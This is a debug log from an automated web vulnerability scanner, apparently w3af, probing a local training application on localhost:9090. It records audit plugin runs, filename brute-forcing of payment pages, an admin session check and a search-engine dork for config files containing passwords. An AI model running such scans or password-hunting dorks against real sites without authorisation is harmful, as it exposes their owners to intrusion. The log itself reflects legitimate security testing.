HTTP code "200" (id=1072,from_cache=0,grep=1,rtt=0.05,did=J23oyGAU) [Wed Feb 12 09:37:54 2020 - debug] Unknown post-data. Content-type: "text/plain" and/or post-data "iZvkuY" [Wed Feb 12 09:37:54 2020 - debug] symfony.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] private_ip.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] expect_ct.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] xpath.audit(did="oaEJJ54G", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:54 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:oaEJJ54G) [Wed Feb 12 09:37:54 2020 - debug] svn_users.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] file_upload.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:54 2020 - debug] redos.audit(did="KCSKnDGP",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.43s to run [Wed Feb 12 09:37:54 2020 - debug] cors_origin.audit(did="1p1O81sy", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] xpath.audit(did="oaEJJ54G",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.18s to run [Wed Feb 12 09:37:54 2020 - debug] htaccess_methods.audit(did="vqm3nayZ", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/modules/paymentcomplete.aspx returned HTTP code "404" (id=1075,from_cache=0,grep=1,rtt=0.39,did=17Okc5Wl) [Wed Feb 12 09:37:54 2020 - debug] dav.audit(did="J9EhgbXP", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] dav.audit(did="J9EhgbXP",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 128. [Wed Feb 12 09:37:54 2020 - debug] GET http://localhost:9090/modules/complete.asp returned HTTP code "404" (id=1073,from_cache=0,grep=1,rtt=0.15,did=cwBR3yHK) [Wed Feb 12 09:37:54 2020 - debug] motw.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] meta_generator.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] retirejs.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] Unknown post-data. Content-type: "text/plain" and/or post-data "iZvkuY" [Wed Feb 12 09:37:54 2020 - debug] serialized_object.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] blank_body.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] credit_cards.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] websockets_links.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] csp.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] dom_xss.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] vulners_db.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] keys.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] clamav.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] ssi.audit(did="sZOd9Dqk", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/inc/return.py returned HTTP code "404" (id=1074,from_cache=0,grep=1,rtt=0.18,did=91n3pvjF) [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/inc/paid.aspx returned HTTP code "404" (id=1076,from_cache=0,grep=1,rtt=0.36,did=K70bROlZ) [Wed Feb 12 09:37:54 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] objects.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] error_500.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] meta_tags.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] password_profiling.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] click_jacking.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] lang.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] xxe.audit(did="vJnEBRWJ", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:55 2020 - debug] GET http://localhost:9090/includes/payment.aspx returned HTTP code "404" (id=1081,from_cache=0,grep=1,rtt=0.17,did=4TqqgsYy) [Wed Feb 12 09:37:55 2020 - debug] POST http://localhost:9090/includes/transactioncomplete.py returned HTTP code "404" (id=1084,from_cache=0,grep=1,rtt=0.06,did=ES9kR4yP) [Wed Feb 12 09:37:55 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 129. [Wed Feb 12 09:37:55 2020 - debug] eval.audit(did="vTOYBMtn", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:55 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:vTOYBMtn) [Wed Feb 12 09:37:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:55 2020 - debug] eval.audit(did="vTOYBMtn",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] xxe.audit(did="vJnEBRWJ",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.16s to run [Wed Feb 12 09:37:55 2020 - debug] localhost:9090 connection pool stats (free:51 / in_use:2 / max:50 / total:53) [Wed Feb 12 09:37:55 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.22 sec) (084f56a9dda1c119, 0.06 sec) [Wed Feb 12 09:37:55 2020 - debug] get_emails.grep(uri="http://localhost:9090/filesInCache.json") took 2.52s to run [Wed Feb 12 09:37:55 2020 - debug] strange_reason.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] cache_control.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:55 2020 - debug] GET http://localhost:9090/inc/success.asp returned HTTP code "404" (id=1078,from_cache=0,grep=1,rtt=0.15,did=LW4aRY5K) [Wed Feb 12 09:37:55 2020 - debug] GET http://localhost:9090/servlet/valid.aspx returned HTTP code "404" (id=1077,from_cache=0,grep=1,rtt=0.25,did=WuoOq7h0) [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/modules/validatepayment.aspx returned HTTP code "404" (id=1089,from_cache=0,grep=1,rtt=0.22,did=HLDLLLiP) [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/servlet/finished.py returned HTTP code "404" (id=1082,from_cache=0,grep=1,rtt=0.36,did=0jlmQwhR) [Wed Feb 12 09:37:56 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:37:56 2020 - debug] POST http://localhost:9090/modules/validatepay.py returned HTTP code "404" (id=1079,from_cache=0,grep=1,rtt=0.31,did=1fs8jxTr) [Wed Feb 12 09:37:56 2020 - debug] rosetta_flash.audit(did="8XfcqlfS", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:56 2020 - debug] strange_headers.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] ssn.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/modules/finished.aspx returned HTTP code "404" (id=1083,from_cache=0,grep=1,rtt=0.36,did=e7chs9NX) [Wed Feb 12 09:37:56 2020 - debug] POST http://localhost:9090/includes/validpay.py returned HTTP code "404" (id=1080,from_cache=0,grep=1,rtt=0.39,did=e1nvNtjN) [Wed Feb 12 09:37:56 2020 - debug] rosetta_flash.audit(did="8XfcqlfS",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.11s to run [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/servlet/validation.py returned HTTP code "404" (id=1087,from_cache=0,grep=1,rtt=0.30,did=8jAOofo3) [Wed Feb 12 09:37:56 2020 - debug] POST http://localhost:9090/module/validate.aspx returned HTTP code "404" (id=1088,from_cache=0,grep=1,rtt=0.40,did=VHzC3PML) [Wed Feb 12 09:37:56 2020 - debug] error_pages.grep(uri="http://localhost:9090/DMIoG") took 0.24s to run [Wed Feb 12 09:37:56 2020 - debug] oracle.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] feeds.grep(uri="http://localhost:9090/DMIoG") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] xss.audit(did="8TeEVX4i", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/module/paymentsuccess.py returned HTTP code "404" (id=1090,from_cache=0,grep=1,rtt=0.22,did=adW6I9mf) [Wed Feb 12 09:37:56 2020 - debug] xst.audit(did="iboxBRf0", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:56 2020 - debug] xst.audit(did="iboxBRf0",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] ssl_certificate.audit(did="CrRpG9br", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:56 2020 - debug] ssl_certificate.audit(did="CrRpG9br",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:56 2020 - debug] GET http://localhost:9090/includes/pay.aspx returned HTTP code "404" (id=1086,from_cache=0,grep=1,rtt=0.42,did=xi6orqwh) [Wed Feb 12 09:37:56 2020 - debug] POST http://localhost:9090/module/completepay.aspx returned HTTP code "404" (id=1085,from_cache=0,grep=1,rtt=0.61,did=InJEWcEc) [Wed Feb 12 09:37:57 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:57 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned HTTP code "200" (id=1091,from_cache=0,grep=1,rtt=0.12,did=1p1O81sy) [Wed Feb 12 09:37:57 2020 - debug] GET http://localhost:9090/servlet/return.aspx returned HTTP code "404" (id=1092,from_cache=0,grep=1,rtt=0.28,did=PHXVMakA) [Wed Feb 12 09:37:57 2020 - debug] preg_replace.audit(did="946zXN5q", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:57 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:57 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:946zXN5q) [Wed Feb 12 09:37:57 2020 - debug] xss.audit(did="8TeEVX4i",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.10s to run [Wed Feb 12 09:37:57 2020 - debug] mx_injection.audit(did="a8Rx8aZ6", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:57 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/DMIoG") took 0.34s to run [Wed Feb 12 09:37:57 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned HTTP code "200" (id=1094,from_cache=0,grep=1,rtt=0.15,did=StpLRaJn) [Wed Feb 12 09:37:57 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 130. [Wed Feb 12 09:37:57 2020 - debug] GET http://localhost:9090/modules/paymentcomplete.aspx returned HTTP code "404" (id=1096,from_cache=0,grep=1,rtt=0.16,did=Q6VzkMwE) [Wed Feb 12 09:37:57 2020 - debug] global_redirect.audit(did="ODoSvHLQ",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 1.55s to run [Wed Feb 12 09:37:57 2020 - debug] response_splitting.audit(did="YbNbHFYj", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:57 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:57 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:a8Rx8aZ6) [Wed Feb 12 09:37:57 2020 - debug] GET http://www.google.com/xhtml?q=site:localhost inurl:zebra.conf intext:password -sample -test -tutorial -download&start=0 returned HTTP code "200" (id=1093,from_cache=0,grep=1,rtt=0.82,did=OWbtLg3H) [Wed Feb 12 09:37:57 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 478, 'reject-seen-url': 262, 'reject-out-of-scope': 12, 'accept': 173} [Wed Feb 12 09:37:57 2020 - debug] preg_replace.audit(did="946zXN5q",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.21s to run [Wed Feb 12 09:37:57 2020 - debug] rfd.audit(did="3RXPTP6e", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:57 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a6_sec_misconf" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 1021 [Wed Feb 12 09:37:57 2020 - debug] rfd.audit(did="3RXPTP6e",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:57 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:57 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:sZOd9Dqk) [Wed Feb 12 09:37:57 2020 - debug] ssi.audit(did="sZOd9Dqk",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 1.02s to run [Wed Feb 12 09:37:57 2020 - debug] POST http://localhost:9090/inc/success.py returned HTTP code "404" (id=1102,from_cache=0,grep=1,rtt=0.22,did=Aj55yzJm) [Wed Feb 12 09:37:57 2020 - debug] POST http://localhost:9090/servlet/finished.jsp returned HTTP code "404" (id=1099,from_cache=0,grep=1,rtt=0.05,did=DZ9S6UHU) [Wed Feb 12 09:37:57 2020 - debug] htaccess_methods.audit(did="vqm3nayZ",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 1.35s to run [Wed Feb 12 09:37:57 2020 - debug] rfi.audit(did="6goxwzgw", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:58 2020 - debug] GET http://localhost:9090/servlet/validatepayment.py returned HTTP code "404" (id=1103,from_cache=0,grep=1,rtt=0.19,did=JtG5Cz2a) [Wed Feb 12 09:37:58 2020 - debug] mx_injection.audit(did="a8Rx8aZ6",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.32s to run [Wed Feb 12 09:37:58 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 131. [Wed Feb 12 09:37:58 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:58 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:YbNbHFYj) [Wed Feb 12 09:37:58 2020 - debug] frontpage.audit(did="ZD9eFN2e", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:58 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.py returned HTTP code "404" (id=1101,from_cache=0,grep=1,rtt=0.13,did=qp4EKLWN) [Wed Feb 12 09:37:58 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:37:58 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: JdfDwx3H) [Wed Feb 12 09:37:58 2020 - debug] response_splitting.audit(did="YbNbHFYj",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.26s to run [Wed Feb 12 09:37:58 2020 - debug] frontpage.audit(did="ZD9eFN2e",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.04s to run [Wed Feb 12 09:37:58 2020 - debug] GET http://localhost:9090/modules/validation.aspx returned HTTP code "404" (id=1097,from_cache=0,grep=1,rtt=0.13,did=6lYks0ak) [Wed Feb 12 09:37:58 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:58 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:6goxwzgw) [Wed Feb 12 09:37:58 2020 - debug] RFI using local web server for URL: http://localhost:9090/learn/vulnerability/a6_sec_misconf [Wed Feb 12 09:37:59 2020 - debug] GET http://localhost:9090/inc/transactioncomplete.aspx returned HTTP code "404" (id=1106,from_cache=0,grep=1,rtt=0.38,did=A6WuJv1q) [Wed Feb 12 09:37:59 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 132. [Wed Feb 12 09:37:59 2020 - debug] GET http://localhost:9090/inc/return.py returned HTTP code "404" (id=1107,from_cache=0,grep=1,rtt=0.07,did=GG3e0ocH) [Wed Feb 12 09:37:59 2020 - debug] POST http://localhost:9090/servlet/valid.pl returned HTTP code "404" (id=1095,from_cache=0,grep=1,rtt=0.18,did=wIbtKBy7) [Wed Feb 12 09:37:59 2020 - debug] POST http://localhost:9090/modules/complete.py returned HTTP code "404" (id=1098,from_cache=0,grep=1,rtt=0.47,did=MpDpqpJd) [Wed Feb 12 09:37:59 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:37:59 2020 - debug] Connections with more in use time: (d49dc8e833c97ce2, 0.30 sec) (a5419411797e137e, 0.23 sec) (084f56a9dda1c119, 0.01 sec) [Wed Feb 12 09:37:59 2020 - debug] POST http://localhost:9090/modules/finished.pl returned HTTP code "404" (id=1100,from_cache=0,grep=1,rtt=0.15,did=08e5TftY) [Wed Feb 12 09:37:59 2020 - debug] POST http://localhost:9090/includes/payment.pl returned HTTP code "404" (id=1104,from_cache=0,grep=1,rtt=0.30,did=pE2UVKpC) [Wed Feb 12 09:37:59 2020 - debug] POST http://localhost:9090/modules/validatepayment.pl returned HTTP code "404" (id=1111,from_cache=0,grep=1,rtt=0.19,did=eXK1Y1Xx) [Wed Feb 12 09:38:00 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 133. [Wed Feb 12 09:38:00 2020 - debug] POST http://localhost:9090/includes/pay.pl returned HTTP code "404" (id=1108,from_cache=0,grep=1,rtt=0.23,did=F3ukBOx8) [Wed Feb 12 09:38:00 2020 - debug] POST http://localhost:9090/servlet/return.pl returned HTTP code "404" (id=1112,from_cache=0,grep=1,rtt=0.06,did=MjEuM8aJ) [Wed Feb 12 09:38:00 2020 - debug] POST http://localhost:9090/module/paymentsuccess.jsp returned HTTP code "404" (id=1110,from_cache=0,grep=1,rtt=0.19,did=YkY9LweT) [Wed Feb 12 09:38:00 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:38:00 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:6goxwzgw) [Wed Feb 12 09:38:00 2020 - debug] GET http://localhost:9090/servlet/success.aspx returned HTTP code "404" (id=1105,from_cache=0,grep=1,rtt=0.19,did=z3mKkoZ6) [Wed Feb 12 09:38:00 2020 - debug] GET http://localhost:9090/modules/validatepay.py returned HTTP code "404" (id=1113,from_cache=0,grep=1,rtt=0.28,did=t1ymrDIN) [Wed Feb 12 09:38:00 2020 - debug] GET http://localhost:9090/module/successful.py returned HTTP code "404" (id=1109,from_cache=0,grep=1,rtt=0.12,did=CI6K6SVs) [Wed Feb 12 09:38:00 2020 - debug] rfi.audit(did="6goxwzgw",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.78s to run [Wed Feb 12 09:38:00 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 134. [Wed Feb 12 09:38:00 2020 - debug] GET http://localhost:9090/includes/transactioncomplete.py returned HTTP code "404" (id=1115,from_cache=0,grep=1,rtt=0.15,did=gPCF2za3) [Wed Feb 12 09:38:00 2020 - debug] POST http://localhost:9090/servlet/validation.jsp returned HTTP code "404" (id=1114,from_cache=0,grep=1,rtt=0.13,did=52clxkfG) [Wed Feb 12 09:38:01 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 135. [Wed Feb 12 09:38:01 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned HTTP code "200" (id=1116,from_cache=0,grep=1,rtt=0.48,did=1p1O81sy) [Wed Feb 12 09:38:01 2020 - debug] cors_origin.audit(did="1p1O81sy",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 2.62s to run (0.60s 22% sending HTTP requests) [Wed Feb 12 09:38:01 2020 - debug] POST http://localhost:9090/modules/paymentcomplete.pl returned HTTP code "404" (id=1123,from_cache=0,grep=1,rtt=0.18,did=ObXRZ9vB) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/modules/validation.pl returned HTTP code "404" (id=1125,from_cache=0,grep=1,rtt=0.08,did=s4cvxYce) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/includes/validpay.py returned HTTP code "404" (id=1119,from_cache=0,grep=1,rtt=0.36,did=15uGMLxT) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/modules/trxcomplete.py returned HTTP code "404" (id=1122,from_cache=0,grep=1,rtt=0.36,did=wIV7FyHH) [Wed Feb 12 09:38:02 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 486, 'reject-seen-url': 273, 'reject-out-of-scope': 13, 'accept': 178} [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/module/validate.aspx returned HTTP code "404" (id=1120,from_cache=0,grep=1,rtt=0.32,did=X5OyiUlR) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/inc/paid.aspx returned HTTP code "404" (id=1124,from_cache=0,grep=1,rtt=0.12,did=TBannthe) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/servlet/validatepayment.jsp returned HTTP code "404" (id=1117,from_cache=0,grep=1,rtt=0.24,did=kZQpFRv8) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/learn/vulnerability/a10_logging returned HTTP code "200" (id=1118,from_cache=0,grep=0,rtt=0.18,did=wTsJgHQX) [Wed Feb 12 09:38:02 2020 - debug] The framework has 116 active threads. [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/includes/completepayment.aspx returned HTTP code "404" (id=1127,from_cache=0,grep=1,rtt=0.19,did=aBQ8tVn6) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/module/completepay.aspx returned HTTP code "404" (id=1129,from_cache=0,grep=1,rtt=0.32,did=rcbQtRhH) [Wed Feb 12 09:38:02 2020 - debug] file_upload.audit(did="0uEsJM7t", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:02 2020 - debug] file_upload.audit(did="0uEsJM7t",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.00s to run [Wed Feb 12 09:38:02 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:5 / max:50 / total:53) [Wed Feb 12 09:38:02 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.43 sec) (084f56a9dda1c119, 0.35 sec) (20c6fb7a85d275d0, 0.30 sec) (ff37903b27d7f8f9, 0.11 sec) (f5adb0c09c70ca09, 0.05 sec) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/module/paymentsuccessful.jsp returned HTTP code "404" (id=1128,from_cache=0,grep=1,rtt=0.41,did=zI3Azufp) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=1121,from_cache=0,grep=0,rtt=0.16,did=JdfDwx3H) [Wed Feb 12 09:38:02 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: JdfDwx3H) [Wed Feb 12 09:38:02 2020 - debug] detailed._login() took 1.53s to run [Wed Feb 12 09:38:02 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=291 returned HTTP code "200" (id=1126,from_cache=0,grep=0,rtt=1.37,did=pAhVv04N) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/inc/transactioncomplete.pl returned HTTP code "404" (id=1130,from_cache=0,grep=1,rtt=0.17,did=ZfKDlGDl) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/servlet/success.pl returned HTTP code "404" (id=1132,from_cache=0,grep=1,rtt=0.08,did=YtCNJU6C) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/inc/return.jsp returned HTTP code "404" (id=1134,from_cache=0,grep=1,rtt=0.21,did=Jdl4D7xJ) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/modules/validatepay.jsp returned HTTP code "404" (id=1133,from_cache=0,grep=1,rtt=0.09,did=g5QLxf6K) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/modules/complete.py returned HTTP code "404" (id=1135,from_cache=0,grep=1,rtt=0.24,did=WjmD4OB6) [Wed Feb 12 09:38:02 2020 - debug] csrf.audit(did="OFFqLEzG", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:02 2020 - debug] csrf.audit(did="OFFqLEzG",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.00s to run [Wed Feb 12 09:38:02 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 136. [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/module/validate.pl returned HTTP code "404" (id=1138,from_cache=0,grep=1,rtt=0.07,did=iAO5gJOB) [Wed Feb 12 09:38:02 2020 - debug] deserialization.audit(did="tx8rmjdH", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:02 2020 - debug] os_commanding.audit(did="TS3QJaAO", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () 